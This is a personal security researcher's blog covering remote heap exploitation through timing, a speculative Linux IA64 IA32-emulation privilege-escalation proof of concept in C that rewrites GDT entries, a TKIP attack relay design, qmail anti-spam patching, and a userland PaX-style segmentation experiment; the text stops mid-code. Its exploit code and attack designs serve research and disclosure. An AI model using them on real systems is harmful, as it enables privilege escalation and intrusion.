This is where I put up my thoughts / random notes on things, and whatever I feel like at the point in time. Usually it will be security focused.

For those who are curious, I used the asciidoc package to generate this website, as I don't have too much motivation to write a page out in html syntax and make it look pretty. Thanks to Steven for his script to generate rss feeds from this page structure. Here's the shell script that makes all the html pages for me.

Timing attacks and heap exploitation

(added 17/10/2009)

While recently working on a heap overflow, I wanted to be able to exploit remote unknown targets that have executable memory. Just for completeness, Exec-shield and PaX would not have prevented exploitation on the distros I checked; they just required a couple more offsets. Oh, and -D_FORTIFY_SOURCE=2 does not help either.

Anyway, the vulnerability has some peculiarities which make it slightly more fun than normal. During input processing the heap layout can change considerably. With enough massaging, you can either overwrite a structure with a pointer to a structure which has a function pointer, or cause it to write some data we semi-control to a pointer we can control. Given the situation, both are relatively easy to exploit, although read-only GOT entries will make the latter method harder against unknown targets. (There are function pointers in the .bss, however hitting them requires a lot more massaging and/or luck.)

Because trying X input strings (where X should allow you to hit it with Y probability) for each address would end up being a lot of attempts / crashes, it would be better to isolate a single suitable input string, then loop over potential memory ranges looking for our code. However, the question then is, "Is it feasible to do so?"

In the case of this particular vulnerability, it is feasible, using information gained from how long the remote process takes to crash and the socket to shut down. What we measure is the time between sending the string and the socket shutting down, which relates to how much processing was done in the remote process.

If it closes very quickly, it implies we have hit an exit(1) code path early on due to the heap modification. If it takes too long, we've hit another exit(1) code path, but only after it's done a lot of heap processing first.

If it closes a little bit before our ideal time, it usually means the massaging was a little off; a bit after tends to mean the same. However, there's usually enough difference to identify the ideal case.
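To make the bucketing a bit more concrete, here's a rough sketch of how a measured time could be sorted into those cases. The function name, the labels, and the target/tolerance/near numbers are all made up for illustration; real values would have to come from measuring the actual target.

```python
def classify_timing(elapsed, target, tolerance, near):
    """Bucket one measurement relative to a hypothetical ideal time.

    target    -- the time (seconds) we expect for the "ideal" crash
    tolerance -- how far from target still counts as ideal
    near      -- how far from target counts as "massaging slightly off"
    All three are assumptions for this sketch, not measured values.
    """
    delta = elapsed - target
    if abs(delta) <= tolerance:
        return "ideal"
    if abs(delta) <= near:
        return "massaging slightly off"
    # Far away from the target: one of the two exit(1) paths.
    return "early exit" if delta < 0 else "late exit"


# Illustrative numbers only.
for sample in (0.0010, 0.0050, 0.0056, 0.0200):
    print(f"{sample:.4f} -> {classify_timing(sample, 0.005, 0.0002, 0.001)}")
```

The thresholds would need re-tuning per target and per network path, since load and latency shift the whole distribution.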

Of course, using timing information is only useful in certain situations (ideally you're close to the target machine, with little load on each end and low network load). Those challenges can be reduced by owning a machine close to your target. It also helps if the vulnerability you're targeting gives you useful timing information.

The below graph information was generated via:

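import select
import time

# skt is a socket already connected to the target
trigger_str = generate_potential_trigger_string()
start = time.time()
skt.send(trigger_str)
# wait (up to 1 second) for the socket to become readable or error out
rlist, wlist, xlist = select.select([skt], [], [skt], 1.0)
stop = time.time()
difference = stop - start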

and doing that 200 times, sorting, and putting the results into a text file, and having gnuplot graph it for us.
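The whole collect / sort / dump loop could be sketched roughly like this. The helper names (time_until_readable, collect_sorted, format_gnuplot_rows, local_probe) and the timings.dat filename are mine, not from the original tool. time.perf_counter() is swapped in for time.time() since it is meant for measuring intervals, and a local socketpair stands in for the real target so the sketch runs on its own.

```python
import select
import socket
import time


def time_until_readable(skt, payload, timeout=1.0):
    """Send payload, then return the seconds until skt is readable,
    errors out, or the timeout expires."""
    start = time.perf_counter()
    skt.sendall(payload)
    select.select([skt], [], [skt], timeout)
    return time.perf_counter() - start


def collect_sorted(probe, attempts=200):
    """Call probe() attempts times and return the timings, sorted."""
    return sorted(probe() for _ in range(attempts))


def format_gnuplot_rows(samples):
    """One 'index time' row per sample, which gnuplot can plot directly."""
    return "".join(f"{i} {t:.6f}\n" for i, t in enumerate(samples))


def local_probe():
    """Stand-in for the real target: a socketpair whose far end has
    already written a byte, so our end is readable straight away."""
    ours, theirs = socket.socketpair()
    try:
        theirs.sendall(b"x")
        return time_until_readable(ours, b"trigger")
    finally:
        ours.close()
        theirs.close()


if __name__ == "__main__":
    samples = collect_sorted(local_probe, attempts=200)
    with open("timings.dat", "w") as fh:
        fh.write(format_gnuplot_rows(samples))
```

Something like `plot "timings.dat" using 1:2` in gnuplot should then give a sorted curve of the same general shape as the graph discussed here.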

While it could probably be argued that python isn't ideal for gathering such precise timing information, we'll ignore that for now. It's working for this demonstration, which is all I care about :p

In the below graph, red crosses are "uninteresting", and green ones are "interesting". The "interesting" state is a crash that's directly related to the function pointer cleanup code. The blue dot is a crash relating to memset() (usually a pointer we control), and purple is an "other" crash (usually due to our pointer not being aligned properly due to allocation layout).

http://felinemenace.org/~andrewg/Timing_attacks_and_heap_exploitation/all_results.png

The above graph paints an interesting picture. At the beginning there are some very early exit(1) code paths, then more just below the 0.005 time marker. At around the 0.005 and 160 intersect, we start getting crashes due to our input corrupting the process's heap in a useful way (blue/purple/green), taking successively longer to crash.

Once we have one of the green crashes, we can use that to bruteforce the section of memory that will lead to code execution.

In closing, I hope this brief article shows some of the benefits that timing can provide, when suitable, for exploiting targets you have little information about.

Random Update

(added 11/10/2009)

This posting is to clear a backlog of things I've been meaning to post at some stage. They're mostly unfinished due to a lack of motivation.. but here goes:

Potential arch/ia64/ia32/ bug

(started around 23/5/2008)

While recently doing some random research, I was browsing the linux 2.6.25.2 kernel source, in arch/ia64/ia32/. While I was reading over the binfmt_elf32.c file, I stumbled across an interesting comment in the function ia64_elf32_init():

/*
 * Map GDT below 4GB, where the processor can find it.  We need to map
 * it with privilege level 3 because the IVE uses non-privileged accesses to these
 * tables.  IA-32 segmentation is used to protect against IA-32 accesses to them.
 */

I thought it was particularly interesting in how they mentioned that segmentation would be used to protect access and modification of the applicable data.

Please keep in mind that I don't have an IA64 box to test this on, so it's currently speculation based on what information I can gather. If you do have an IA64 box with IA32 Linux emulation, feel free to test and report back to me, I'd be interested in finding out :)

Memory layout

The code seems to lay memory out with a 3GB user address space, with a couple of pages above the 3GB mark for the GDT, LDT, and TSS.

From the ia32priv.h file, we have:

#define IA32_STACK_TOP          IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET        IA32_PAGE_OFFSET
#define IA32_GATE_END           IA32_PAGE_OFFSET + PAGE_SIZE

/*
 * The system segments (GDT, TSS, LDT) have to be mapped below 4GB so the
 * IA-32 engine can
 * access them.
 */
#define IA32_GDT_OFFSET         (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET         (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET         (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

Where IA32_PAGE_OFFSET is #define'd to 0xc0000000 in include/asm-ia64/ia32.h.
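Plugging the numbers in gives the concrete addresses. This sketch assumes PAGE_SIZE is 4096, which is what the proof of concept code in this post uses; the kernel header uses the kernel's own PAGE_SIZE, which may not be 4096 on a given ia64 build, so treat the results as illustrative. The ia32_layout() helper is hypothetical.

```python
IA32_PAGE_OFFSET = 0xC0000000
PAGE_SIZE = 4096  # assumption: matches the PoC in this post, not necessarily the kernel


def ia32_layout(page_offset=IA32_PAGE_OFFSET, page_size=PAGE_SIZE):
    """Mirror the #defines from ia32priv.h as a name -> address mapping."""
    return {
        "STACK_TOP": page_offset,
        "GATE": page_offset,
        "GDT": page_offset + page_size,
        "TSS": page_offset + 2 * page_size,
        "LDT": page_offset + 3 * page_size,
    }


for name, address in ia32_layout().items():
    print(f"{name:10} 0x{address:08x}")
```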

So how can we access the data

There appear to be several ways we can access the data. The easiest is probably via the standard system calls that take a pointer and use it in some way, such as read() or write(). Additionally, we can directly modify the data by creating a new descriptor and setting the limit to 4GB (which can be done via the modify_ldt() syscall).

Using the read() / write() mechanism is probably the best way to manipulate the data, and probably most flexible.

Creating a new descriptor is easy enough, the below code shows how to:

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/ldt.h>
#include <stdio.h>

#define TYPE user_desc // modify_ldt_ldt_s for 2.4

int do_ldt(int num, unsigned long base, int type)
{
        struct TYPE ldt_entry = {
                num, // entry_number
                (unsigned long int) (base), // base_address
                0xfffff, // limit, 4G
                1, // seg_32bit
                type, // contents
                0, // read_exec_only
                1, // limit_in_pages
                0, // seg_not_present
                1 // usable
        };
        return modify_ldt(1, &ldt_entry, sizeof(struct TYPE)) == 0;
}

int main(int argc, char **argv)
{
        if(do_ldt(0, 0, MODIFY_LDT_CONTENTS_DATA) == 0) {
                printf("Failed to modify the ldt\n");
                exit(EXIT_FAILURE);
        }
        // the new segment will be accessible via 0x07, (0 * 8) | user priv | ldt etc.
        __asm__ volatile("pushw $7;\
                          popw %ds;");
        printf("We've changed our ds segment descriptor\n");
}

If the above code is being compiled on a 2.4 kernel, the struct user_desc will need to be changed to struct modify_ldt_ldt_s, which can be done via changing the TYPE define above. This should allow direct access according to the comment above. Make sure it's compiled in 32 bit mode, and appropriate emulation options/modules are active.
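For reference, the 0x07 selector and the "4G" limit in the code above fall out of the standard x86 encodings: a selector is the table index shifted left by 3, plus the table-indicator bit (4 for the LDT) and the requested privilege level, and a page-granular limit covers (limit + 1) * 4096 bytes. A quick sketch of the arithmetic (both function names are mine):

```python
def selector(index, use_ldt=True, rpl=3):
    """Build an x86 segment selector: index << 3 | TI bit | RPL."""
    table_indicator = 4 if use_ldt else 0
    return (index << 3) | table_indicator | rpl


def segment_size(limit, limit_in_pages=True):
    """Bytes covered by a segment with the given 20-bit limit field."""
    units = limit + 1
    return units * 4096 if limit_in_pages else units


print(hex(selector(0)))                 # LDT entry 0, ring 3
print(hex(selector(4, use_ldt=False)))  # GDT entry 4, ring 3
print(hex(segment_size(0xFFFFF)))       # page-granular limit of 0xfffff
```

GDT entry 4 at ring 3 works out to 0x23, which is the __USER_CS value that shows up later in this post.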

The code in 2.6.25.2 doesn't do any checking of what memory becomes accessible in ia32_ldt.c's write_ldt() function.

Proof of concept

I'd like to repeat that I don't have access to an IA64 box to test this out, but I'm going to attempt to write a couple of proof of concept exploits. Let me know if it works :)

Dumping descriptor tables

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>

#define PAGE_SIZE               4096
#define IA32_PAGE_OFFSET        0xc0000000
//#define IA32_PAGE_OFFSET      (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP          IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET        IA32_PAGE_OFFSET
#define IA32_GATE_END           IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET         (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET         (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET         (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

unsigned char *x;

int main(int argc, char **argv)
{
        int fd;

        fd = open("gdt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
        if(fd == -1) {
                printf("Failed to open gdt.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, (void *)IA32_GDT_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        close(fd);
        printf("Dumped GDT\n");

        fd = open("tss.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
        if(fd == -1) {
                printf("Failed to open tss.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, (void *)IA32_TSS_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        close(fd);
        printf("Dumped TSS\n");

        fd = open("ldt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
        if(fd == -1) {
                printf("Failed to open ldt.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, (void *)IA32_LDT_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        close(fd);
        printf("Dumped LDT\n");
}

Gaining ring0

After thinking about it a little bit, there may be little point in getting ring0 itself, but I haven't completely read through the itanium manuals.

According to the docs I've read so far, I/O ports need to be explicitly mapped in by the operating system, and enabled. Other "privileged" instructions generate traps.

If ring0 would be useful in some capacity, it could be gained by setting appropriate LDT entries if needed, and overwriting the TSS saved CS register and modifying the privilege level.

Privilege escalation

However, there would be a way to gain additional privileges if there exists a setuid root x86 binary installed on the system. This would be done by manipulating the base address of a GDT entry so that upon execve() of a suid process, the entry point would end up pointing to custom code (probably on the stack), due to the segmentation base. From what I've read of the Itanium manual, segmentation is used to calculate the real address it accesses (a la x86).

Setting the GDT base would also have the side effect of probably crashing any existing IA32 processes.

Theory:

Randomisation probably won't be an issue due to the personality() syscall :)

The initial entry point will be the entry point in the binary if it's not dynamically linked. If it is dynamically linked, the loader's entry point will be the initial entry point.

Here's some sample code I came up with; I don't know if it works or not since I don't have access to the architecture to test. Don't forget to compile in 32-bit mode (-m32 may suffice). If your compiler doesn't generate suitable binaries, compile on an x86 box.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>

#define PAGE_SIZE               4096
#define IA32_PAGE_OFFSET        0xc0000000
//#define IA32_PAGE_OFFSET      (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP          IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET        IA32_PAGE_OFFSET
#define IA32_GATE_END           IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET         (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET         (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET         (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

#define __USER_CS      0x23
#define __USER_DS      0x2B


unsigned char *x;

/* borrowed from arch/ia64/ia32/ia32priv.h */

#define IA32_PAGE_SHIFT                        12      /* 4KB pages */

#define __USER_CS      0x23
#define __USER_DS      0x2B

#define IA32_SEG_BASE           16
#define IA32_SEG_TYPE           40
#define IA32_SEG_SYS            44
#define IA32_SEG_DPL            45
#define IA32_SEG_P              47
#define IA32_SEG_HIGH_LIMIT     48
#define IA32_SEG_AVL            52
#define IA32_SEG_DB             54
#define IA32_SEG_G              55
#define IA32_SEG_HIGH_BASE      56

/* unsigned long long rather than the kernel's unsigned long: in a 32 bit build
 * unsigned long is only 32 bits wide, so the shifts past bit 31 would be lost. */
#define IA32_SEG_DESCRIPTOR(base, limit, segtype, nonsysseg, dpl, segpresent, avl, segdb, gran) \
               (((limit) & 0xffff)                                                              \
                | (((unsigned long long) (base) & 0xffffff) << IA32_SEG_BASE)                   \
                | ((unsigned long long) (segtype) << IA32_SEG_TYPE)                             \
                | ((unsigned long long) (nonsysseg) << IA32_SEG_SYS)                            \
                | ((unsigned long long) (dpl) << IA32_SEG_DPL)                                  \
                | ((unsigned long long) (segpresent) << IA32_SEG_P)                             \
                | ((((unsigned long long) (limit) >> 16) & 0xf) << IA32_SEG_HIGH_LIMIT)         \
                | ((unsigned long long) (avl) << IA32_SEG_AVL)                                  \
                | ((unsigned long long) (segdb) << IA32_SEG_DB)                                 \
                | ((unsigned long long) (gran) << IA32_SEG_G)                                   \
                | ((((unsigned long long) (base) >> 24) & 0xff) << IA32_SEG_HIGH_BASE))
/* </borrowed> */

int main(int argc, char **argv)
{
        int fd;
        unsigned char scratch[4096];
        unsigned long long *gdt = (unsigned long long *)(scratch);
        unsigned long long entry_point;

        if(argc != 2) {
                printf("%s <gdt offset>\n", argv[0] ? argv[0] : ";PpP");
                printf("--> 0xbfffe000 (or wherever your r00tc0de is- <libc entry point> = offset, i think ;p\n");
                printf("--> offset probably needs to be aligned so it can be shifted\n");
                printf("--> in hex\n");
                exit(EXIT_FAILURE);
        }

        entry_point = strtoul(argv[1], 0, 16);

        fd = open("gdt.bin", O_RDWR|O_TRUNC|O_CREAT, 0600);
        unlink("gdt.bin");
        if(fd == -1) {
                printf("Failed to open gdt.bin: %m\n");
                exit(EXIT_FAILURE);
        }
        if(write(fd, (void *)IA32_GDT_OFFSET, 4096) != 4096) {
                printf("Failed to write() 4096 bytes\n");
                exit(EXIT_FAILURE);
        }
        printf("--> Dumped GDT\n");
        if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
                printf("Unable to seek to start of fd\n");
                exit(EXIT_FAILURE);
        }
        if(read(fd, scratch, 4096) != 4096) {
                printf("Unable to read 4096 bytes from our fd\n");
                exit(EXIT_FAILURE);
        }
        if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
                printf("Unable to seek to start of fd\n");
                exit(EXIT_FAILURE);
        }

        // borrowed from ia32_support.c :P, but modified
        gdt[__USER_CS >> 3] = IA32_SEG_DESCRIPTOR(entry_point, (IA32_GATE_END-1) >> IA32_PAGE_SHIFT,
                0xb, 1, 3, 1, 1, 1, 1);

        if(write(fd, scratch, 4096) != 4096) {
                printf("Unable to write modified data back\n");
                exit(EXIT_FAILURE);
        }
        if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
                printf("Unable to seek backwards\n");
                exit(EXIT_FAILURE);
        }
        printf("--> If things go well, then this should crash once read() returns to userspace. If not, hmm! maybe we moved to another processor afterwards or so?\n");
        if(read(fd, (void *)IA32_GDT_OFFSET, 4096) != 4096) {
                printf("Failed to read() 4096 bytes :(\n");
                exit(EXIT_FAILURE);
        }
        printf("Hrm. It worked. but it hasn't crashed. Maybe re-run a couple of times? Maybe I've missed something?\n");
        close(fd);

}

At any rate, spender tested the code up to dumping GDT, which goes to show it can be accessed, and presumably modified (I suspect you could mprotect() if it is made read only at some stage).

At any rate, I haven't been able to test due to lack of access to hardware :p
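If you want to sanity check descriptor values without the hardware, the packing done by IA32_SEG_DESCRIPTOR can be reproduced on any machine. This is only a sketch: the bit positions are copied from the #defines in the code above, seg_descriptor() and decode_base() are my own names, and the base value in the example is arbitrary. Python integers don't overflow, so the shifts past bit 31 are safe.

```python
import struct

SEG_BASE, SEG_TYPE, SEG_SYS, SEG_DPL, SEG_P = 16, 40, 44, 45, 47
SEG_HIGH_LIMIT, SEG_AVL, SEG_DB, SEG_G, SEG_HIGH_BASE = 48, 52, 54, 55, 56


def seg_descriptor(base, limit, segtype, nonsysseg, dpl, present, avl, db, gran):
    """Pack the fields of an 8-byte x86 segment descriptor into one integer."""
    return ((limit & 0xFFFF)
            | ((base & 0xFFFFFF) << SEG_BASE)
            | (segtype << SEG_TYPE)
            | (nonsysseg << SEG_SYS)
            | (dpl << SEG_DPL)
            | (present << SEG_P)
            | (((limit >> 16) & 0xF) << SEG_HIGH_LIMIT)
            | (avl << SEG_AVL)
            | (db << SEG_DB)
            | (gran << SEG_G)
            | (((base >> 24) & 0xFF) << SEG_HIGH_BASE))


def decode_base(descriptor):
    """Recover the 32-bit base address from a packed descriptor."""
    low = (descriptor >> SEG_BASE) & 0xFFFFFF
    high = (descriptor >> SEG_HIGH_BASE) & 0xFF
    return low | (high << 24)


# A flat, ring 3, 32-bit code segment covering 4GB.
flat_code = seg_descriptor(0, 0xFFFFF, 0xB, 1, 3, 1, 0, 1, 1)
print(f"0x{flat_code:016x}")

# The same segment with an arbitrary non-zero base, as little-endian bytes.
shifted = seg_descriptor(0x12345000, 0xFFFFF, 0xB, 1, 3, 1, 0, 1, 1)
print(struct.pack("<Q", shifted).hex(), hex(decode_base(shifted)))
```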

TKIP Conspiracy fun

(started 14/12/2008)

When the TKIP flaw came to light (which allowed you to send a couple of packets to a client station), I played around with the idea of using an attacker controlled machine on the internet to help "conspire" against the client station.

By using the UIP TCP/IP stack, I wrote a program to help attack the client by the following means:

Wireless attacker -> Does TKIP attack, can send some packets to client machine
Wireless attacker -> Sends SYN packets to client machine on "common"
                     vulnerable ports (139/445/80/23/etc), with source IP of
                     an internet machine we control
Internet Machine -> Looks for SYN|ACK packets, if found, sets up a suitable
                    UIP connection structure, and fixes up the seq/ack
                    numbers. Machine then creates a local socket, and buffers
                    the data between local socket, and UIP connection to the
                    attacked machine.
Wireless attacker -> Can then attack the client machine with a bunch of
                     standard exploits

This type of attack is highly dependent on the network infrastructure in use. Outgoing SYN|ACKs may not be NAT'd properly in NAT environments (due to no incoming SYN being seen), firewalls may not allow outgoing connections, and as an additional complication the attacked client may have a firewall enabled, etc.
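The "fixes up the seq/ack numbers" step comes down to plain TCP arithmetic: the internet machine never sent the SYN, but the SYN|ACK it sees carries everything needed to continue the handshake. A minimal sketch of just that calculation (the function name is made up, and this is not the uIP code itself):

```python
SEQ_MODULUS = 1 << 32  # TCP sequence numbers wrap at 32 bits


def numbers_from_synack(synack_seq, synack_ack):
    """Given the seq and ack fields of an observed SYN|ACK, return the
    (seq, ack) pair our side should use for the ACK that completes the
    handshake.

    The SYN|ACK acknowledges the spoofed SYN, so its ack field is already
    our next sequence number; the peer's SYN consumes one sequence number,
    so we acknowledge its seq + 1.
    """
    our_seq = synack_ack % SEQ_MODULUS
    our_ack = (synack_seq + 1) % SEQ_MODULUS
    return our_seq, our_ack


print(numbers_from_synack(1000, 5001))
```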

Anti-spam with Gentoo's netqmail package.

(added 5/4/2009)

Recently I was asked to help admin a box (amongst other things). One of the particular concerns was the amount of incoming spam to the box. Usually, I would use postfix + various settings to handle e-mail, but the other admins wanted to keep qmail.

The box itself is running Gentoo Hardened, with qmail. At some stage, a custom qmail was configured — I wanted to return to using the gentoo packaging system to take care of that for me. After finding out it was patched with something to verify RCPT TO headers against (as opposed to accepting mail for every possible email address at a given domain, then sending bounce messages), I looked for something suitable, and came across this patch. Please see this website for further information.

Unfortunately, the patch didn't apply cleanly, so that was fixed. This patch is available here if you want it. It was modified to use /var/qmail/control/moregoodrcptto.cdb as opposed to its default, as that's how the system I was helping with was configured.

Additionally, I wanted SPF verification / rejection if the sending host is not authorized. I found a suitable patch here, which (as you guessed) didn't apply cleanly. The updated patch is available here.

Please see the respective websites for more information / configuration changes you may need to make.

In order to use these with Gentoo, you can do the following:

# mkdir /root/qmail_patches
# cd /root/qmail_patches
# wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/1_rcptto.patch
# wget http://felinemenace.org/~andrewg/antispam_with_gentoo_netqmail/2_spf_filtering.patch
# echo 'QMAIL_PATCH_DIR="/root/qmail_patches"' >> /etc/make.conf
# emerge netqmail

At which point it will compile netqmail with the patches in /root/qmail_patches.

Additionally, I enabled rblsmtpd in /var/qmail/control/conf-smtpd, via uncommenting and editing the QMAIL_SMTP_PRE variable, to the following:

QMAIL_SMTP_PRE="${QMAIL_SMTP_PRE} rblsmtpd -r sbl-xbl.spamhaus.org"
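If you want to check by hand what a DNS blocklist like the one passed to -r would be asked, the usual DNSBL convention is to reverse the octets of the connecting IPv4 address and append the list's zone. A small sketch of building that name (dnsbl_query_name is a made-up helper, and it only builds the name, it doesn't do the lookup):

```python
import ipaddress


def dnsbl_query_name(ip, zone):
    """Return the DNS name a DNSBL lookup for an IPv4 address would use."""
    address = ipaddress.IPv4Address(ip)  # raises ValueError on bad input
    reversed_octets = ".".join(reversed(str(address).split(".")))
    return f"{reversed_octets}.{zone}"


print(dnsbl_query_name("127.0.0.2", "sbl-xbl.spamhaus.org"))
```

Feeding the resulting name to a DNS lookup tool is a quick way to see whether a given address is listed.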

And, well, that's the end of the changes. If you're looking for anti-spam stuff, I'd suggest you use Postfix, as it's still being developed, and doesn't require random patching to get simple functionality working :-)

Pseudo-PaX-in-userland

(started 4/5/2008, added 5/5/2008)

This document describes how it could be feasible to implement a pseudo PaX implementation, completely in userland. The described idea is far more of a plaything than anything completely serious, for reasons described later. It's more just random thoughts and experiments.

I don't recall how I got started along this track, except that it was something I've been meaning to look at for a while.

Introduction

Firstly, we should review how PaX's segmexec operates.

   While Linux effectively does not use segmentation by creating 0 based and
   4 GB limited segments for both code and data accesses (therefore logical
   addresses are the same as linear addresses), it is possible to set up
   segments that allow to implement non-executable pages.

   The basic idea is that we divide the 3 GB userland linear address space
   into two equal halves and use one to store mappings meant for data access
   (that is, we define a data segment descriptor to cover the 0-1.5 GB linear
   address range) and the other for storing mappings for execution (that is,
   we define a code segment descriptor to cover the 1.5-3 GB linear address
   range). Since an executable mapping can be used for data accesses as well,
   we will have to ensure that such mappings are visible in both segments
   and mirror each other. This setup will then separate data accesses from
   instruction fetches in the sense that they will hit different linear
   addresses and therefore allow for control/intervention based on the access
   type. In particular, if a data-only (and therefore non-executable) mapping
   is present only in the 0-1.5 GB linear address range, then instruction
   fetches to the same logical addresses will end up in the 1.5-3 GB linear
   address range and will raise a page fault hence allow detecting such
   execution attempts.

PaX's segmexec works by modifying the Global Descriptor Table which separates code and data requests to different virtual addresses.

Userspace, as far as I know, can't modify the Global Descriptor Table, but it can influence its own Local Descriptor Table via the modify_ldt() system call. The modify_ldt() syscall can create code and data descriptors easily enough, and we can use call far and return far (amongst other techniques) to change into that selector.

Proof of concept

As a sample, let's try and execute an int3 instruction. We'll create a new LDT entry with a base address of 4096, which means that once it's loaded into CS, every code address has to have 4096 subtracted from it. And on with the show:

#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>

asm(".globl debug;\
        .type   debug, @function;\
debug:;\
        int3;\
.size   debug, .-debug;\
        "
        );

extern void debug();

/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
        unsigned int  entry_number;
        unsigned long base_addr;
        unsigned int  limit;
        unsigned int  seg_32bit:1;
        unsigned int  contents:2;
        unsigned int  read_exec_only:1;
        unsigned int  limit_in_pages:1;
        unsigned int  seg_not_present:1;
        unsigned int  useable:1;
};

#define MODIFY_LDT_CONTENTS_DATA        0
#define MODIFY_LDT_CONTENTS_STACK       1
#define MODIFY_LDT_CONTENTS_CODE        2
*/

int do_ldt(int num, unsigned long base, int type)
{
        struct modify_ldt_ldt_s ldt_entry = {
                num, // entry_number
                (unsigned long int) (base), // base_address
                0xfffff, // limit, 4G or so :p
                1, // seg_32bit
                type, // contents
                1, // read_exec_only
                1, // limit_in_pages
                0, // seg_not_present
                1 // usable
        };
        return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}

int main(int argc, char **argv)
{
        short int seg;

        if(do_ldt(0, 0x1000, MODIFY_LDT_CONTENTS_CODE) == 0) {
                printf("Failed to modify ldt\n");
                exit(EXIT_FAILURE);
        }
        seg = 7; // (0 * 8) + 7
        //printf("new segment: %d|%02x\n", seg, seg);

        __asm__ volatile("pushw %0;\
                        pushl %1;\
                        lret"
                        :
                        : "r" (seg), "r" ((unsigned int)(debug) - 0x1000)
                        );

}

Running the above code under a debugger:

Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGTRAP, Trace/breakpoint trap.
0x08047559 in ?? ()
(gdb) x/4i $eip -1
0x8047558:      Cannot access memory at address 0x8047558
(gdb) x/4i $eip - 1 + 4096
0x8048558 <debug>:      int3
0x8048559 <do_ldt>:     push   %ebp
0x804855a <do_ldt+1>:   mov    %esp,%ebp
0x804855c <do_ldt+3>:   sub    $0x48,%esp
(gdb) i r cs
cs             0x7      7

As we can see in the debugger output, it's possible to set a custom CS descriptor, and execute code. Due to the now non-flat memory address space, it also messes with debugging a little bit.
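The address juggling in that gdb session is just the segment base being added on every instruction fetch: linear = base + logical, modulo 4GB. A tiny sketch of the conversion in both directions, using the addresses from the session above (the function names are mine):

```python
ADDRESS_SPACE = 1 << 32  # 32-bit linear addresses wrap at 4GB


def linear_from_logical(logical, base):
    """What the CPU actually fetches for a CS-relative address."""
    return (base + logical) % ADDRESS_SPACE


def logical_from_linear(linear, base):
    """What has to be loaded into EIP to reach a given linear address."""
    return (linear - base) % ADDRESS_SPACE


CS_BASE = 0x1000
debug_linear = 0x08048558  # <debug> as gdb resolves it in the flat view

eip_for_debug = logical_from_linear(debug_linear, CS_BASE)
print(hex(eip_for_debug))      # the value pushed before the lret
print(hex(eip_for_debug + 1))  # EIP after the one-byte int3 has executed
print(hex(linear_from_logical(eip_for_debug, CS_BASE)))
```

This is why gdb reports the trap at 0x08047559 and can't read memory there: it treats EIP as a flat address and doesn't add the CS base.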

Implementing the Pseudo-PaX

Quickly reviewing what we need to do:

Doing the above completely correctly would be difficult from userland, but possible if a bit of effort was to be expended.

For the purposes of this article, we'll write it using dietlibc, and make it not that feasible to use.

#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <fcntl.h>
#include <asm/ldt.h>
#include <sys/mman.h>
#include <asm/unistd.h>


/*
<asm/ldt.h>
struct modify_ldt_ldt_s {
        unsigned int  entry_number;
        unsigned long base_addr;
        unsigned int  limit;
        unsigned int  seg_32bit:1;
        unsigned int  contents:2;
        unsigned int  read_exec_only:1;
        unsigned int  limit_in_pages:1;
        unsigned int  seg_not_present:1;
        unsigned int  useable:1;
};

#define MODIFY_LDT_CONTENTS_DATA        0
#define MODIFY_LDT_CONTENTS_STACK       1
#define MODIFY_LDT_CONTENTS_CODE        2
*/

_syscall3(int,modify_ldt,int,op,void*,what,int,len);

/*int modify_ldt(int op, void *what, int len)
{
        return syscall(__NR_modify_ldt, op, what, len);
}*/


int do_ldt(int num, unsigned long base, int type)
{
        struct modify_ldt_ldt_s ldt_entry = {
                num, // entry_number
